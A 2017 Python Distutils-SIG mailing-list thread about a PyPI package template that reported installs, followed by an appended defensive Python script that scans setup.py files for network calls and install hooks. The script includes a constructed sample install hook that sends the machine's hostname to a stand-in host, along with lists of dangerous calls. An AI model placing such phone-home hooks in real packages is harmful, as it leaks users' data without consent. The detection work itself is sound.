[Distutils] Malicious packages on PyPI

Xavier Fernandez xav.fernandez at gmail.com
Thu Jun 1 15:31:59 EDT 2017


On a related note, this reminds me of
https://hackernoon.com/building-a-botnet-on-pypi-be1ad280b8d6

On Thu, Jun 1, 2017 at 7:40 PM, Thomas Kluyver <thomas at kluyver.me.uk> wrote:

> On Thu, Jun 1, 2017, at 06:32 PM, Matt Joyce wrote:
>
> It's basically a test dummy package that reports users who have run that
> package template.
>
>
> That's what I thought, but all the code to do the upload seems to have
> been removed before s/he built those packages. Now it's just a harmless
> warning, unless I'm missing something.
>
> https://github.com/fate0/cookiecutter-evilpy-package/commit/
> a3ed1e1e060748b0444158ea3bc569dfbf57645e
>
> The site referenced lists the package name that the user ran to get posted
> to the site. There appear to be many packages on PyPI that are built off
> this fatezero template.
>
>
> There *appear* to be, but I checked several of the names listed there, and
> they're not on PyPI:
>
> https://pypi.python.org/pypi/tkinter
> https://pypi.python.org/pypi/memcached
> https://pypi.python.org/pypi/vtk
> https://pypi.python.org/pypi/python-dev
> https://pypi.python.org/pypi/opencv
>
> So I wonder if the data is fake. Or maybe they were already taken down? Or
> the installations are real, but not using those names.
>
> PyPI is not a very good package management solution. I advise most folks
> to build from PyPI in CI/CD but push to production via a real package
> management solution such as apt or yum. Always double-check sources coming
> from the internet.
>
>
> It's an open repository that anyone can upload to. That has its drawbacks
> and its advantages.
>
>
> _______________________________________________
> Distutils-SIG maillist  -  Distutils-SIG at python.org
> https://mail.python.org/mailman/listinfo/distutils-sig
>
>
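As an added example (not code from this thread or from the evilpy template), a defender-side static check for the "double check sources" advice above: it parses a setup.py and flags network imports, command-execution or URL-fetch calls, and setuptools cmdclass hooks that would let a package run code or reach the network while pip installs it. Both setup.py samples are constructed for the example.

```python
# Added example: static triage of a setup.py for install-time side effects.
# pip executes setup.py with the installing user's privileges, so network or
# command use there deserves a second look before the package is trusted.
import ast

NETWORK_MODULES = {"socket", "urllib", "urllib2", "httplib", "http", "requests", "ftplib"}
DANGEROUS_CALLS = {"os.system", "os.popen", "subprocess.call", "subprocess.run",
                   "subprocess.Popen", "subprocess.check_output", "eval", "exec",
                   "urllib.request.urlopen", "urllib2.urlopen", "requests.get", "requests.post"}
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}  # setuptools cmdclass bases

def _dotted(node):
    # Render a Name/Attribute chain such as urllib.request.urlopen as a string.
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # call target is not a plain dotted name

def triage_setup_py(source):
    """Return sorted 'kind:detail' findings for the given setup.py source text."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for name in names:
                if name.split(".")[0] in NETWORK_MODULES:
                    findings.add(f"network-import:{name}")
        elif isinstance(node, ast.Call) and _dotted(node.func) in DANGEROUS_CALLS:
            findings.add(f"dangerous-call:{_dotted(node.func)}")
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = _dotted(base) or ""
                if base_name.split(".")[-1] in INSTALL_HOOKS:
                    findings.add(f"install-hook:{node.name}({base_name})")
    return sorted(findings)

# Constructed samples: a benign setup.py and one that phones home at install time.
BENIGN = "from setuptools import setup\nsetup(name='pkg', version='0.1')\n"
PHONE_HOME = """
from setuptools import setup
from setuptools.command.install import install
import urllib.request, socket
class PostInstall(install):
    def run(self):
        urllib.request.urlopen('http://example.invalid/?h=' + socket.gethostname())
setup(name='pkg', version='0.1', cmdclass={'install': PostInstall})
"""
```

Run `triage_setup_py(open("setup.py").read())` against an unpacked sdist before installing it; an empty list is not proof of safety, only the absence of these obvious constructs.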